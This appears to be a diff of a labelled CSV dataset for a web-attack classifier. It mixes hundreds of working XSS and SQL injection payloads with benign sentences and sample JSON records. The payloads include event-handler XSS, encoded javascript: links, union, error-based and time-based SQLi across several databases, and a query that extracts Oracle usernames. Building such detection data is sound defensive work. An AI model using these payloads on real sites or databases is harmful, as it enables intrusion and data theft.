ontransitionend=alert(1)></blockquote>",1,XSS,2154 +1%' and ( 2439 = 2555 ) *2555 and '%' = ',2,SQLi,16136 +"-8943%' ) union all select 7710,7710#",2,SQLi,14703 +"<meta oncopy=""alert(1)"" contenteditable>test</meta>",1,XSS,8171 +",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*",2,SQLi,10915 +"1%"" ) ) ) and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,17207 +<button onContextMenu=javascript:alert(1)>,1,XSS,9559 +"<q onmouseover=""alert(1)"">test</q>",1,XSS,7336 +"<style>@keyframes x{}</style><datalist style=""animation-name:x"" onanimationend=""alert(1)""></datalist>",1,XSS,7096 +<sup onpointerenter=alert(1)>XSS</sup>,1,XSS,8769 +"1"" ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ""mlld"" like ""mlld",2,SQLi,22344 +A select company of these met at the parsonage on Sunday afternoons.,0,normal,26376 +waitfor delay '0:0:5' and ( ( 'nvqf' = 'nvqf,2,SQLi,12807 +"1%"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) and ( ( ( ""%"" = """,2,SQLi,18524 +Where's the nature reserve?,0,normal,23558 +"1"" ) ) as yfpl where 4820 = 4820 union all select null,null,null,null,null,null,null--",2,SQLi,21036 +"1"" ) waitfor delay '0:0:5'--",2,SQLi,20353 +-4960' ) union all select 5300--,2,SQLi,13460 +"<style>@keyframes slidein {}</style><xss style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></xss>",1,XSS,4 +<canvas id=x tabindex=1 ondeactivate=alert(1)></canvas><input id=y autofocus>,1,XSS,8726 +"-7007 ) union all select 6704,6704--",2,SQLi,19535 +"<frame oncopy=""alert(1)"" contenteditable>test</frame>",1,XSS,6468 +<button onReadyStateChange=javascript:alert(1)>,1,XSS,9615 +"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--",2,SQLi,10868 +"onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// +'`><\x00img src=xxx:x onerror=javascript:alert(1)>",1,XSS,9499 +"1%"" ) ) union all select null#",2,SQLi,18023 +"1"" ) ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) and ( ( ( ""prtf"" like ""prtf",2,SQLi,20486 +AND 1=0#,2,SQLi,10114 +"<;META HTTP-EQUIV="";refresh""; CONTENT="";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"";>;",1,XSS,1541 +<dialog onpointerup=alert(1)>XSS</dialog>,1,XSS,3367 +"><script+src=https://www.meteoprog.ua/data/weather/informer/Poltava.js?callback=alert(1337)""></script>",1,XSS,9774 +"<source draggable=""true"" ondragstart=""alert(1)"">test</source>",1,XSS,7707 +"1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) # hkrp",2,SQLi,16961 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--",2,SQLi,10865 +"<noscript onbeforepaste=""alert(1)"" contenteditable>test</noscript>",1,XSS,8644 +"1'|| ( select 'fmss' from dual where 7025 = 7025 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) ) ||'",2,SQLi,19437 +-7164%' or 4747 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4747 = 4747 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = ',2,SQLi,17111 +"<object onmouseenter=""alert(1)"">test</object>",1,XSS,6875 +"<style>@keyframes x{}</style><br style=""animation-name:x"" onanimationstart=""alert(1)""></br>",1,XSS,3942 +1'|| ( select 'goen' from dual where 8586 = 8586,2,SQLi,12812 +"&lt;A HREF=\""http&#58;//google&#58;ha&#46;ckers&#46;org\""&gt;XSS&lt;/A&gt;",1,XSS,1013 +"<style></style\x0A<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,429 +"select * from generate_series ( 6414,6414,case when ( 6414 = 6455 ) then 1 else 0 end ) limit 1--",2,SQLi,21581 +"1 ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( 5220 = 5220",2,SQLi,16099 +"<a ondblclick=""alert(1)"">test</a>",1,XSS,2998 +"1"" ) ) and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and ( ( ""vdyr"" = ""vdyr",2,SQLi,16511 +"<ul onmouseenter=""alert(1)"">test</ul>",1,XSS,3663 +"<i draggable=""true"" ondrag=""alert(1)"">test</i>",1,XSS,4707 +Retrieve data where required.,0,normal,23331 +"1"" ) as uyms where 6210 = 6210 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,17503 +"1"" ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ""wmmg"" like ""wmmg",2,SQLi,14019 +"-3501"" ) ) ) or ( 6789 = 6990 ) *6990 and ( ( ( ""jnnc"" like ""jnnc",2,SQLi,12484 +"1%' ) union all select null,null,null--",2,SQLi,14101 +1' ) where 3588 = 3588,2,SQLi,18014 +"select * from users where id = 1 or "".,"" or 1 = 1 -- 1",2,SQLi,11424 +"-7139"" ) where 2723 = 2723 or 3900 = 5082--",2,SQLi,18359 +"javascript:/*""/*'/*`/*\""/**/ alert()//*</title></textarea></style></noscript></noembed></template></option></select></SCRIPT>--><<svg onload=alert()><frame src=javascript:alert()>",1,XSS,9470 +"<address draggable=""true"" ondragstart=""alert(1)"">test</address>",1,XSS,3670 +"<br onmouseover=""alert(1)"">test</br>",1,XSS,6238 +"-5934' union all select 6096,6096,6096,6096,6096#",2,SQLi,17442 +I'm considering where to go for a jog.,0,normal,23635 +"<script>$=1,alert($)</script>//INJECTX",1,XSS,9812 +<footer onpointerenter=alert(1)>XSS</footer>,1,XSS,6144 +1'+ ( select 'wpnm' where 8223 = 8223 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) ) +',2,SQLi,17856 +1 where 7464 = 7464 rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) --,2,SQLi,19572 +’ or ‘1’=’1,2,SQLi,10972 +"""hi"""" ) or ( """"a"""" = """"a""",2,SQLi,11771 +"<ruby onmousedown=""alert(1)"">test</ruby>",1,XSS,2860 +"<set attributeName=""xlink:href"" begin=""accessKey(d)"" to=""//example.com/?d"" />",1,XSS,9253 +"<meter onpaste=""alert(1)"" contenteditable>test</meter>",1,XSS,6780 +"<script src=""javascript:alert(3)""></script> // IE6, O11.01↓, OM10.1↓//[""'`-->]]>]</div>",1,XSS,9203 +"<area draggable=""true"" ondrag=""alert(1)"">test</area>",1,XSS,2689 +<plaintext onpointerenter=alert(1)>XSS</plaintext>,1,XSS,6127 +"1"" where 3678 = 3678 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --",2,SQLi,12740 +"union ( select NULL, NULL, NULL, ( select @@version ) ) --",2,SQLi,11947 +"-7125"" or ( 8919 = 2275 ) *2275 and ""fbwo"" = ""fbwo",2,SQLi,20730 +"1' in boolean mode ) or 2367 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --",2,SQLi,18782 +"select sleep ( 5 ) and ( ""tlbj"" like ""tlbj",2,SQLi,15304 +"Its sixth early-stage fund, True Ventures VI LP, closed with $350 million in committed capital, and its third Select Fund, True Ventures Select III, closed with $285 million in committed capital.",0,normal,25894 +Select beer.,0,normal,24477 +"1"" and ( select 2* ( if ( ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 3484 = 3484,1 ) ) ) ,0x717a767a71,0x78 ) ) s ) , 8446744073709551610, 8446744073709551610 ) ) ) and ""svse"" = ""svse",2,SQLi,20118 +Be sure the toys you select are suitable for babies.,0,normal,26290 +"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and '%' = '",2,SQLi,14757 +<u onpointerenter=alert(1)>XSS</u>,1,XSS,4449 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#",2,SQLi,10709 +) AND (SELECT 1337 FROM (SELECT(SLEEP(5)))YYYY)-- 1337,2,SQLi,11098 +"-2790"" ) ) as vcvw where 6075 = 6075 or 7078 = 8148--",2,SQLi,19734 +"<div draggable=""true"" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe>",1,XSS,5706 +<noframes onpointerup=alert(1)>XSS</noframes>,1,XSS,4439 +<u id=x tabindex=1 onbeforedeactivate=alert(1)></u><input autofocus>,1,XSS,8493 +-3431%' ) or 9323 = 9323#,2,SQLi,12690 +<blink onpointermove=alert(1)>XSS</blink>,1,XSS,8188 +1'|| ( select 'fwph' where 3791 = 3791,2,SQLi,12544 %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-,1,XSS,1088 -[a](Javas%26%2399;ript:alert(1&#41;),1,XSS,9454 -"1%"" ) union all select null,null,null,null,null,null,null,null,null,null--",2,SQLi,14067 -<cite onpointerenter=alert(1)>XSS</cite>,1,XSS,2235 -1' ) as svtm where 7627 = 7627 rlike ( select * from ( select ( sleep ( 5 ) ) ) sgvo ) --,2,SQLi,19537 -">""'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)>",1,XSS,1636 -<noembed onpointerdown=alert(1)>XSS</noembed>,1,XSS,6881 -"1' ) and make_set ( 9961 = 6559,6559 ) and ( 'exde' = 'exde",2,SQLi,19984 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#",2,SQLi,10661 -declare @s varchar ( 200 ) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec ( @s ),2,SQLi,12053 -1 ) as jdhz where 2021 = 2021,2,SQLi,16847 -"<?='<SCRIPT>alert(""XSS"")</SCRIPT>'?>",1,XSS,1256 -<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>,1,XSS,312 -"{""id"":null,""name"":""far""}",0,normal,25498 -if ( 5127 = 2829 ) select 5127 else drop function okos--,2,SQLi,18463 -Select your image.,0,normal,25074 -"-9829' ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,17996 -"`'><script>\x09javascript:alert(1)</script> -`'><script>\x0Ajavascript:alert(1)</script>",1,XSS,9587 -"-5910%' ) ) ) union all select 5184,5184,5184,5184,5184,5184,5184,5184,5184,5184--",2,SQLi,12602 -"{""id"":null,""name"":""cup""}",0,normal,25792 -"<data onbeforecut=""alert(1)"" contenteditable>test</data>",1,XSS,1720 -"-1512 union all select 9013,9013,9013,9013#",2,SQLi,14769 -"<style>@keyframes slidein {}</style><nav style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></nav>",1,XSS,3480 -<noframes id=x tabindex=1 onfocus=alert(1)></noframes>,1,XSS,2992 -"<script onmouseenter=""alert(1)"">test</script>",1,XSS,3853 -Where's the support group?,0,normal,23841 -select ( case when ( 8711 = 6432 ) then 1 else 8711* ( select 8711 from master..sysdatabases ) end ) --,2,SQLi,14136 -"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('');"">",1,XSS,2944 -"1' ) as xvcr where 6456 = 6456 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) --",2,SQLi,12541 -0x77616974666F722064656C61792027303A303A313027 ...,2,SQLi,10161 -"-1084' ) union all select 2634,2634,2634,2634,2634,2634,2634,2634#",2,SQLi,20687 -"-4347' union all select 6074,6074,6074,6074,6074,6074,6074--",2,SQLi,13552 -"<wbr onmouseenter=""alert(1)"">test</wbr>",1,XSS,5997 -"-4166%"" ) union all select 5190--",2,SQLi,14221 -=+ SLEEP(5) + ',2,SQLi,11426 -"-7528' or make_set ( 3809 = 1821,1821 ) and 'kgch' = 'kgch",2,SQLi,14804 -<aside id=x tabindex=1 onactivate=alert(1)></aside>,1,XSS,6562 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#",2,SQLi,10577 -"<tbody onbeforecut=""alert(1)"" contenteditable>test</tbody>",1,XSS,7094 -<x%2Fonxxx=1,1,XSS,9350 -"1"" ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ""uglh"" like ""uglh",2,SQLi,19822 -declare @q nvarchar ( 200 ) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec ( @q ),2,SQLi,12022 -<style onpointermove=alert(1)>XSS</style>,1,XSS,3950 -"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10964 -<strong onpointerup=alert(1)>XSS</strong>,1,XSS,6770 -"<li ondblclick=""alert(1)"">test</li>",1,XSS,5115 -"<A HREF=""http://0x42.0x0000066.0x7.0x93/""></A>",1,XSS,4259 -"1 union all select null,null,null,null,null,null--",2,SQLi,14601 -"1"" ) ) or ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9173 = 9173,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ""vlev"" like ""vlev",2,SQLi,16653 --5067' ) ) or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( ( 'vkab' like 'vkab,2,SQLi,21516 -1' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and ( 'lnte' = 'lnte,2,SQLi,12560 -"{""id"":null,""firstName"":""Justin"",""lastName"":""Toh"",""address"":""27 Jln Berseh, #01-100, Singapore 200027"",""city"":""466"",""telephone"":""790141621""}",0,normal,25880 -1 and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,15780 -"1' where 2123 = 2123 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,17019 -"<?xml-stylesheet type=""text/xml"" href=""#stylesheet""?>",1,XSS,9023 -1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>,1,XSS,678 -Where's the piercing studio?,0,normal,23799 -OR x=x#,2,SQLi,10238 -"<param onbeforepaste=""alert(1)"" contenteditable>test</param>",1,XSS,5215 -Filter the bright photos.,0,normal,22830 -"<sup onbeforecopy=""alert(1)"" contenteditable>test</sup>",1,XSS,3849 -"1%"" ) ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) and ( ( ""%"" = """,2,SQLi,22492 -"<tbody onmouseout=""alert(1)"">test</tbody>",1,XSS,4878 -"-2787' ) ) union all select 1996,1996,1996,1996,1996,1996,1996,1996#",2,SQLi,22448 -(SELECT * FROM (SELECT(SLEEP(5)))YYYY)--,2,SQLi,11219 -<basefont onpointerdown=alert(1)>XSS</basefont>,1,XSS,8676 -ORDER BY 5,2,SQLi,10344 -1' ) as mpsf where 3348 = 3348,2,SQLi,13498 -"or SLEEP(5)=""",2,SQLi,10411 -"select * from generate_series ( 1488,1488,case when ( 1488 = 1685 ) then 1 else 0 end ) limit 1--",2,SQLi,17544 -"-2384%' ) ) union all select 2467,2467,2467,2467#",2,SQLi,17604 -1' ) ) and sleep ( 5 ) and ( ( 'tcwt' = 'tcwt,2,SQLi,18362 -"<tt onkeyup=""alert(1)"" contenteditable>test</tt>",1,XSS,6953 -<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext>,1,XSS,2744 -"end and ( ""xksk"" = ""xksk",2,SQLi,12548 -Select a plan.,0,normal,25006 -<var id=x tabindex=1 onbeforedeactivate=alert(1)></var><input autofocus>,1,XSS,8343 -<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress>,1,XSS,3025 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24",2,SQLi,10559 --5861' ) or 1581 = 2611 and ( 'mvjh' like 'mvjh,2,SQLi,17705 -"<div id=""68""><doc xmlns:xlink=""http://www.w3.org/1999/xlink"" xmlns:html=""http://www.w3.org/1999/xhtml""> <html:style /><x xlink:href=""javascript:alert(68)"" xlink:type=""simple"">XXX</x></doc>//[""'`-->]]>]</div>",1,XSS,9130 -&lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;,1,XSS,1322 --6757' ) ) ) or 4524 = 3696,2,SQLi,16690 -1' ) ) ) and ( select * from ( select ( sleep ( 5 ) ) ) gcrr ) #,2,SQLi,19116 -<ol onpointermove=alert(1)>XSS</ol>,1,XSS,3439 -"1'+ ( select immd where 7499 = 7499 union all select null,null,null,null,null,null,null,null#",2,SQLi,20902 -<iframe onfocusout=alert(1) id=x><input autofocus>,1,XSS,4851 -"<input onclick=""alert(1)"">test</input>",1,XSS,6721 -<small id=x tabindex=1 onfocusin=alert(1)></small>,1,XSS,8577 -"1%"" ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) and ( ( ( ""%"" = """,2,SQLi,16818 -"<picture draggable=""true"" ondragstart=""alert(1)"">test</picture>",1,XSS,8421 -"<a draggable=""true"" ondragleave=""alert(1)"">test</a>",1,XSS,2027 -"-1366' or make_set ( 9354 = 9354,7185 ) and 'abre' = 'abre",2,SQLi,17570 -1'+ ( select emeu where 2310 = 2310,2,SQLi,19700 -"<style>:target {transform: rotate(180deg);}</style><address id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></address>",1,XSS,1877 -"{""id"":null,""name"":""affect""}",0,normal,25773 -"<xmp draggable=""true"" ondragenter=""alert(1)"">test</xmp>",1,XSS,7639 -Check conditions where valid.,0,normal,23483 -<img id=x tabindex=1 onfocus=alert(1)></img>,1,XSS,6760 -1 rlike ( select ( case when ( 6795 = 5898 ) then 1 else 0x28 end ) ) -- xdkx,2,SQLi,13999 -and 1 = 0 ) union all,2,SQLi,12140 -"<input draggable=""true"" ondragenter=""alert(1)"">test</input>",1,XSS,4611 -"<samp draggable=""true"" ondragstart=""alert(1)"">test</samp>",1,XSS,3883 -"{""id"":null,""firstName"":""Manie"",""lastName"":""Villar"",""address"":""10 Ang Mo Kio Street 65 #03-13 Techpoint"",""city"":""292"",""telephone"":""6324406152""}",0,normal,26012 -"1"" ) ) as maxe where 5883 = 5883 union all select null,null,null,null,null,null,null,null,null#",2,SQLi,14545 -"<;A HREF="";javascript:document.location=';http://www.google.com/';"";>;XSS<;/A>;",1,XSS,1625 -"<listing oncut=""alert(1)"" contenteditable>test</listing>",1,XSS,4780 -Merge records.,0,normal,23264 -""")))))) waitfor delay '0:0:20' --",2,SQLi,10995 -<basefont id=x tabindex=1 onactivate=alert(1)></basefont>,1,XSS,2520 -<dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus>,1,XSS,2003 -"1' ) ) as kpdl where 4443 = 4443 union all select null,null,null,null,null,null--",2,SQLi,15854 -<strong onpointermove=alert(1)>XSS</strong>,1,XSS,4950 -"1'|| ( select 'lije' from dual where 5309 = 5309 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) ) ||'",2,SQLi,14006 -<textarea onpointerout=alert(1)>XSS</textarea>,1,XSS,2637 -( select ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3287 = 3287 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,22347 -"<a onbeforepaste=""alert(1)"" contenteditable>test</a>",1,XSS,7360 -<frame id=x tabindex=1 onbeforeactivate=alert(1)></frame>,1,XSS,6632 -"<IMG SRC=x onmessage=""alert(String.fromCharCode(88,83,83))"">",1,XSS,1131 -"1' ) ) as xuab where 4369 = 4369 union all select null,null,null--",2,SQLi,19631 -{},0,normal,25290 -"{""id"":null,""firstName"":""Adeline"",""lastName"":""Tay"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25387 --7864 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 4493 = 4493 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) # twpw,2,SQLi,13031 -"1"" ) or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) and ( ""gixv"" = ""gixv",2,SQLi,17850 -"<h1 draggable=""true"" ondragleave=""alert(1)"">test</h1>",1,XSS,1772 -"call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) ) +'",2,SQLi,14131 -"1' or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'eqyr' like 'eqyr",2,SQLi,20454 -select case when 8237 = 9948 then 1 else null end--,2,SQLi,20391 -"<sup onbeforecut=""alert(1)"" contenteditable>test</sup>",1,XSS,5378 -Select sign.,0,normal,24814 -"1' ) as ssxj where 3845 = 3845 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,20472 -RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'=',2,SQLi,10371 -"1"" ) where 3404 = 3404 and 8148 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) --",2,SQLi,12841 -"/></a></><img src=1.gif onerror=alert(1)> -window.alert(Bonjour !"");",1,XSS,1247 -<span onpointerover=alert(1)>XSS</span>,1,XSS,4505 -"1%"" union all select null,null--",2,SQLi,21089 -"-2852%' ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,22273 -"<em onkeyup=""alert(1)"" contenteditable>test</em>",1,XSS,5048 -"{""id"":null,""firstName"":"""",""lastName"":"""",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",0,normal,25265 -<ul onpointerover=alert(1)>XSS</ul>,1,XSS,5639 -"1' and row ( 6237,7469 ) > ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 6237 = 6237,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x ) and 'sloy' = 'sloy",2,SQLi,16598 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#",2,SQLi,10575 -"1234 ' AND 1 = 0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",2,SQLi,12069 -"1%"" ) ) and elt ( 7633 = 4110,4110 ) and ( ( ""%"" = """,2,SQLi,19863 -"1"" or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ""zcfa"" = ""zcfa",2,SQLi,14576 -"<style>:target {transform: rotate(180deg);}</style><picture id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></picture>",1,XSS,8263 -"1%' and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and '%' = '",2,SQLi,17336 -select ( case when ( 9667 = 6212 ) then 9667 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13617 -Select the top choice.,0,normal,24451 -"<xmp oncontextmenu=""alert(1)"">test</xmp>",1,XSS,2839 -"1"" ) ) as daqd where 4390 = 4390 and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,14754 -"<IMG STYLE=""xss:expr/*XSS*/ession(javascript:alert(1))"">",1,XSS,719 -1 ) rlike ( select ( case when ( 7689 = 7689 ) then 1 else 0x28 end ) ) and ( 1073 = 1073,2,SQLi,20238 -"1"" ) ) ) waitfor delay '0:0:5' and ( ( ( ""tuhy"" like ""tuhy",2,SQLi,21841 -Select your resolve.,0,normal,25184 -or username like '%,2,SQLi,10065 -1' ) and 4380 = 5851 and ( 'cxcl' = 'cxcl,2,SQLi,16689 -"<title draggable=""true"" ondragenter=""alert(1)"">test</title>",1,XSS,4715 -"{""id"":null,""name"":""adventure parts""}",0,normal,25751 -1 ) ) rlike sleep ( 5 ) and ( ( 8773 = 8773,2,SQLi,14727 -or 'something' like 'some%',2,SQLi,11183 -"AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 8 ) ) AND 'i' = 'i",2,SQLi,12067 -<img srcset=1 onerror=alert(1)>,1,XSS,4986 -"1 ) as adzj where 5575 = 5575 or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,16422 -"&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\""javascript&#058;alert('XSS')\"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;",1,XSS,965 -"a"" or 1=1--",2,SQLi,10201 -"<cite oncut=""alert(1)"" contenteditable>test</cite>",1,XSS,7829 -"<marquee draggable=""true"" ondragend=""alert(1)"">test</marquee>",1,XSS,7628 -select case when 6555 = 7349 then 1 else null end--,2,SQLi,16360 -<table onpointerup=alert(1)>XSS</table>,1,XSS,4406 -"1%' ) or 4411 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) and ( '%' = '",2,SQLi,21973 -<svg contentScriptType=text/vbs><script>MsgBox+1,1,XSS,857 -"{""id"":null,""name"":""divide""}",0,normal,25698 -<footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus>,1,XSS,4472 -"1' ) as noqp where 4042 = 4042 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,15760 -"`'><script>\xE2\x80\x86javascript:alert(1)</script> -`'><script>\xE2\x80\x87javascript:alert(1)</script>",1,XSS,9595 -1 where 4844 = 4844,2,SQLi,13151 -Where can I select a new theme for my website?,0,normal,24077 -"<menu onmouseleave=""alert(1)"">test</menu>",1,XSS,7947 -"{""id"":null,""name"":""duck""}",0,normal,25249 -<svg><strike onload=alert(1)></strike>,1,XSS,6226 -"1%' ) ) ) union all select null,null,null#",2,SQLi,15476 -"<progress onmousedown=""alert(1)"">test</progress>",1,XSS,2689 -any,0,normal,23366 -Insert the text.,0,normal,23070 -Select the ideal book for your mood.,0,normal,24398 -<keygen id=x tabindex=1 ondeactivate=alert(1)></keygen><input id=y autofocus>,1,XSS,8249 --6473' union all select 7537#,2,SQLi,19893 -"1 ) ) as henn where 9980 = 9980 or 4915 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) 